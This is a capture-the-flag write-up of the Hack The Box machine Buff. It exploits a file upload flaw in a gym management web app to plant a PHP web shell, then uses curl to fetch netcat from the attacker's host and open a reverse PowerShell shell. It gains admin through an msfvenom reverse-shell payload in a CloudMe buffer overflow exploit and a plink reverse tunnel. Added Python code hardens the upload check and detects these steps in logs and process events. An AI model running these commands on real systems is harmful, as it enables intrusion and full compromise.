Buff — Hack The Box Writeup

inth3wild
6 min read · Mar 6, 2021

Summary

  • Exploit and get remote code execution on the web application using an existing POC.
  • Take advantage of the RCE vulnerability to get a netcat connection and gain a shell on the box.
  • Enumerate running services on the box and find an application vulnerable to buffer overflow with existing exploit/POC.
  • Convert the exploit from Python format (.py) to an executable (.exe) using pyinstaller.
  • Transfer the executable over to the box, start a listener and run the executable.

Foothold

As usual, we start with an nmap scan to find what services are running on the box.

[image: nmap scan result]

From the above picture, only port 8080 is open, with the Apache web server running on it. Even an nmap full port scan shows only port 8080 open. Therefore we head over to port 8080 to see what kind of web application is running on the server.

[image: website’s homepage]

A fitness/gym web application. There’s an email and password sign-in form in the navigation bar, but we don’t have any valid email. I checked the other pages on the site, but there was nothing really important in them until I landed on the Contact page.

[image: contact page]

The page says “Made using Gym Management Software 1.0”. A Google search on the keyword “Gym management software 1.0” brings up the following results:

The first link points to Exploit Database (exploit-db). That means we can get the exploit using searchsploit. Running:

searchsploit Gym management

brings up one search result. Then:

searchsploit -m php/webapps/48506.py

copies the exploit code to the current directory.

You can rename the file if you want to. Luckily for me, the exploit was written in Python, so I could understand a little of what was going on.

Firstly, Gym Management System version 1.0 allows unauthenticated file upload, meaning anyone can upload files to the web server without logging in. This file upload functionality has improper/weak restrictions on the types of files that can be uploaded, allowing attackers to upload arbitrary file types instead of only images (png, jpg, jpeg). So what the exploit code does is:

  1. Upload a PHP file named kaio-ken.php.png; the vulnerable web application then renames it to whatever value is given in the id parameter (set to kamehameha in the exploit code).

  2. Bypass the allowed file extension list by using a double extension. The web application takes the file’s extension to be the first extension after the first “.”, hence .php.png.

  3. Bypass the file type check the web application performs by setting the Content-Type header of the upload request to image/png.

  4. Set the content of the uploaded PHP file to PHP code that executes shell commands using the value supplied by the telepathy parameter. So if the value is whoami, it is executed as a shell command.

  5. Finally, connect to the web shell.
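As an added illustration (not code from this writeup or from Gym Management Software), here is the kind of server-side upload check that the three bypasses above defeat, next to a hardened version. The hardened check ignores the client’s Content-Type, rejects any name whose extensions are not all allowlisted (so a double extension like .php.png fails outright), verifies the file’s magic bytes against the type its extension claims, and stores the file under a server-generated name so no request parameter can influence the path. The allowlist, magic bytes and sample uploads are constructed for the example:

```python
from __future__ import annotations

import os
import secrets

# Constructed allowlist: permitted image extensions and the magic bytes each must start with.
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
ALLOWED_CONTENT_TYPES = {"image/png", "image/jpeg"}


def all_extensions(filename: str) -> list[str]:
    """Every extension in the client-supplied name, lowercased: 'a.php.png' -> ['php', 'png']."""
    base = os.path.basename(filename.replace("\\", "/"))
    return [part.lower() for part in base.split(".")[1:] if part]


def weak_validate(filename: str, content_type: str, data: bytes) -> bool:
    """Hypothetical weak check of the kind the writeup's bypasses defeat (not the real
    application's code): trusts the client's Content-Type header and looks only at the
    final extension, so kaio-ken.php.png sent as image/png passes."""
    last_ext = filename.rsplit(".", 1)[-1].lower()
    return content_type in ALLOWED_CONTENT_TYPES and last_ext in ALLOWED_MAGIC


def validate_upload(filename: str, content_type: str, data: bytes) -> tuple[bool, str]:
    """Hardened check: Content-Type is ignored entirely, every extension in the name must
    be allowlisted, and the body must carry the magic bytes of the type it claims to be."""
    exts = all_extensions(filename)
    if not exts:
        return False, "no extension"
    disallowed = [e for e in exts if e not in ALLOWED_MAGIC]
    if disallowed:
        # Double extensions such as kaio-ken.php.png are rejected here.
        return False, f"disallowed extension(s): {disallowed}"
    expected_magic = ALLOWED_MAGIC[exts[-1]]
    if not data.startswith(expected_magic):
        return False, "file content does not match the claimed image type"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Server-chosen name: a random token plus the validated extension. Neither the client's
    filename nor any id-style parameter decides where the file is written."""
    return f"{secrets.token_hex(16)}.{all_extensions(filename)[-1]}"


# Constructed sample uploads: a minimal PNG-looking body and a script hidden behind a double extension.
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
DISGUISED_SCRIPT = b"<?php /* constructed placeholder body, not a real payload */ ?>"

if __name__ == "__main__":
    for name, ctype, body in [("photo.png", "image/png", REAL_PNG),
                              ("kaio-ken.php.png", "image/png", DISGUISED_SCRIPT)]:
        print(name, "weak:", weak_validate(name, ctype, body),
              "hardened:", validate_upload(name, ctype, body))
```

Beyond the validator itself, the upload directory should have script execution disabled at the web server, so that even a file that slips past the checks is served as static content rather than run.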

Therefore we run:

python2 Gym-management-exploit.py 'http://10.10.10.198:8080/'

And we successfully connect to the web shell.

[image: web shell]

User

There’s a small problem with the Gym Management exploit: the web shell it gives you isn’t interactive, i.e. you can’t change out of the directory you land in (C:\xampp\htdocs\gym\upload).

However, thanks to the tip @tazwake gave: to have a proper interactive shell, you’ll have to transfer netcat over to the box and run it. But it’s a Windows box, so you’ll need netcat for Windows? Yes. I didn’t know Kali ships Windows binaries, and one of those binaries is netcat. In Kali Linux, it can be found in the /usr/share/windows-resources/binaries/ directory.

So, start a Python web server in the directory where nc.exe is located:

python3 -m http.server

Use the telepathy parameter to download netcat from your attacking machine:

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl+http://YOUR-IP-HERE:8000/nc.exe+-o+nc.exe

Start a netcat listener on your machine:

nc -nlvp 9001

Then use the telepathy parameter to execute the downloaded netcat and get an interactive shell:

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc.exe+-v+YOUR-IP-HERE+9001+-e+powershell

The -e flag tells netcat which program to execute after a successful connection (PowerShell). We are now the user shaun and can read the user flag.
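From the defender’s side, every step above leaves a line in the Apache access log: a script being requested from the image upload directory, and a query parameter carrying what looks like a shell command. The following detector, added here as an example and not part of the writeup, parses common-format access log lines and flags both patterns. The log lines, the attacker address 10.10.14.5 and the token list are constructed for the example:

```python
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

# Apache/XAMPP "common" log format; anything after the response size is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_DIRS = ("/upload/",)                       # directories meant to hold images only
SCRIPT_EXTS = (".php", ".phtml", ".php3", ".php5", ".phar")
# Tokens that suggest a shell command is being passed in a query parameter (constructed list).
CMD_TOKENS = ("curl ", "wget ", "certutil", "nc.exe", "powershell", "cmd.exe", "whoami", "ipconfig")


def parse_line(line: str) -> dict | None:
    """Split one access log line into fields, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def findings(target: str) -> list[str]:
    """Reasons a request target looks like web-shell activity, in a stable order."""
    url = urlsplit(target)
    path = url.path.lower()
    out = []
    # A script extension under an image-upload directory is a finding on its own.
    if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXTS):
        out.append("script_in_upload_dir")
    # parse_qs already turns '+' into spaces and decodes percent escapes.
    for key, values in parse_qs(url.query, keep_blank_values=True).items():
        decoded = " ".join(values).lower()
        if any(tok in decoded for tok in CMD_TOKENS):
            out.append(f"command_like_param:{key}")
    return out


def scan(lines) -> list[tuple[str, str, list[str]]]:
    """Return (ip, target, findings) for every parseable line that triggers a rule."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        hits = findings(rec["target"])
        if hits:
            alerts.append((rec["ip"], rec["target"], hits))
    return alerts


# Constructed sample log: normal browsing, two web-shell requests, a real image, and junk.
SAMPLE_LOG = [
    '10.10.14.5 - - [06/Mar/2021:10:12:01 +0000] "GET /contact.php HTTP/1.1" 200 5120',
    '10.10.14.5 - - [06/Mar/2021:10:13:40 +0000] "GET /upload/kamehameha.php?telepathy=whoami HTTP/1.1" 200 35',
    '10.10.14.5 - - [06/Mar/2021:10:14:02 +0000] "GET /upload/kamehameha.php?telepathy=curl+http://10.10.14.5:8000/nc.exe+-o+nc.exe HTTP/1.1" 200 0',
    '10.10.14.7 - - [06/Mar/2021:10:15:30 +0000] "GET /upload/logo.png HTTP/1.1" 200 20481',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, target, hits)
```

The first rule is the more reliable one: no request for a .php file under an image-only directory is legitimate, whatever the query string says, so it should fire even when an attacker picks parameter values the token list does not know.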

[image: user flag]

Administrator

There was a lot of stuff to look at for privilege escalation (rabbit holes): lots of credentials in files, etc., but the right path was through a vulnerable application. The exploit code for that application was written in Python, and Python was not installed on the box (Buff). So there were two ways to exploit the vulnerable application and become admin:

  1. Convert the exploit written in Python to an executable (.exe) and then run it on the box.
  2. Use the Windows tool plink.exe to connect back to your attacking machine (Kali), which has Python installed. This gives your attacking machine direct access to the local port the vulnerable application is listening on.

METHOD (1)

Firstly, what is this vulnerable application? Using winPEAS (a tool that searches for possible ways to escalate privileges), in the running-applications section of its output there is one in particular: CloudMe.exe. Running searchsploit CloudMe on your Kali machine brings up a lot of results. Pick the first one (windows/remote/48389.py) and copy it to your current directory.

This is a buffer overflow exploit, again written in Python. The payload in this particular exploit (windows/remote/48389.py) just pops calc, i.e. opens the Windows calculator program.

But that’s not what we want the exploit to do. We want a reverse shell, so we generate our own reverse shell payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR-IP-HERE LPORT=PORT-NUMBER EXITFUNC=thread -b "\x00\x0d\x0a" -f python

Copy the output of the command (the payload) and use it to replace the original payload in the CloudMe exploit. *msfvenom generates the payload with the variable name “buf”, but that variable name already exists in the exploit code (lines 52 and 57), so rename the variable in the exploit code. I used “buffe”.

[image: variable rename]

Now send this modified exploit to a Windows machine that has Python installed, convert it to an executable (.exe) using pyinstaller or py2exe, send the executable over to the Buff machine, start a netcat listener and then run the executable:

  1. C:\whatever\whatever\Python\Python37\Scripts\pyinstaller.exe .\Cloudme-exploit.py --onefile

*If you used pyinstaller, the .exe will be in the “dist” folder.

  2. nc -nlvp 9001

METHOD (2)

plink.exe is also located in the Windows binaries directory of your Kali. Transfer it to the box, then start the SSH server on your Kali:

systemctl start ssh.service

Then run the following command on the windows box (Buff):

.\plink.exe USERNAME@YOUR-IP -R 8888:127.0.0.1:8888

*8888 is the local port CloudMe listens on.

You’ll then be connected to your Kali machine. Move to the directory where the CloudMe exploit is stored and just run it:

python3 Cloudme.py

*Remember, you must have changed the payload to execute a reverse shell. I named my exploit “Cloudme.py”.

And then you’ll get a reverse shell connection as admin.
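Both privilege escalation routes, and the netcat step before them, show up clearly in process-creation telemetry (Sysmon event ID 1 or equivalent): a web server process spawning a command shell, a binary executing out of the web-writable upload directory, netcat started with -e, and plink started with a remote (-R) port forward. The following rule set, added here as an example and not part of the writeup, classifies constructed event records with those fields; the paths, hostname and user fields are made up for the example, and only C:\xampp\htdocs\gym\upload is taken from the writeup:

```python
from __future__ import annotations

import re

WEB_SERVER_IMAGES = ("httpd.exe", "apache.exe", "w3wp.exe", "nginx.exe", "php-cgi.exe")
SHELL_IMAGES = ("cmd.exe", "powershell.exe", "pwsh.exe")
# Web-writable paths that should never host an executable (from the writeup's landing directory).
UPLOAD_DIRS = (r"c:\xampp\htdocs\gym\upload",)
NETCAT_RE = re.compile(r"(^|[\\/\s])nc(64)?\.exe(\s|$)", re.I)


def basename(path: str) -> str:
    """Last path component, lowercased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Rule hits for one process-creation event, in a stable order."""
    image = event["image"].lower()
    parent = basename(event["parent_image"])
    cmd = event["command_line"]
    tokens = cmd.split()
    hits = []
    if any(image.startswith(d) for d in UPLOAD_DIRS):
        hits.append("exec_from_upload_dir")
    if parent in WEB_SERVER_IMAGES and basename(image) in SHELL_IMAGES:
        hits.append("webserver_spawned_shell")
    if NETCAT_RE.search(cmd) and "-e" in tokens:
        hits.append("netcat_exec_redirect")
    # plink -R asks the remote SSH server to forward one of its ports back to this host.
    if tokens and basename(tokens[0]) == "plink.exe" and "-R" in tokens:
        hits.append("reverse_ssh_tunnel")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str, list[str]]]:
    """Return (index, user, hits) for every event that triggers at least one rule."""
    return [(i, ev["user"], classify(ev)) for i, ev in enumerate(events) if classify(ev)]


# Constructed sample events modelled on Sysmon event ID 1 fields.
SAMPLE_EVENTS = [
    {"image": r"C:\xampp\apache\bin\httpd.exe", "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\xampp\apache\bin\httpd.exe -k runservice", "user": r"BUFF\shaun"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\xampp\apache\bin\httpd.exe",
     "command_line": "cmd.exe /c whoami", "user": r"BUFF\shaun"},
    {"image": r"C:\xampp\htdocs\gym\upload\nc.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "nc.exe -v 10.10.14.5 9001 -e powershell", "user": r"BUFF\shaun"},
    {"image": r"C:\Users\shaun\Downloads\plink.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r".\plink.exe user@10.10.14.5 -R 8888:127.0.0.1:8888", "user": r"BUFF\shaun"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe notes.txt", "user": r"BUFF\shaun"},
]

if __name__ == "__main__":
    for index, user, hits in scan(SAMPLE_EVENTS):
        print(index, user, hits)
```

The parent-child rule is the one worth tuning first: an Apache or PHP worker has no business starting cmd.exe or powershell.exe on a gym-management server, so that single relationship catches the web shell regardless of which binary the attacker downloads next.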
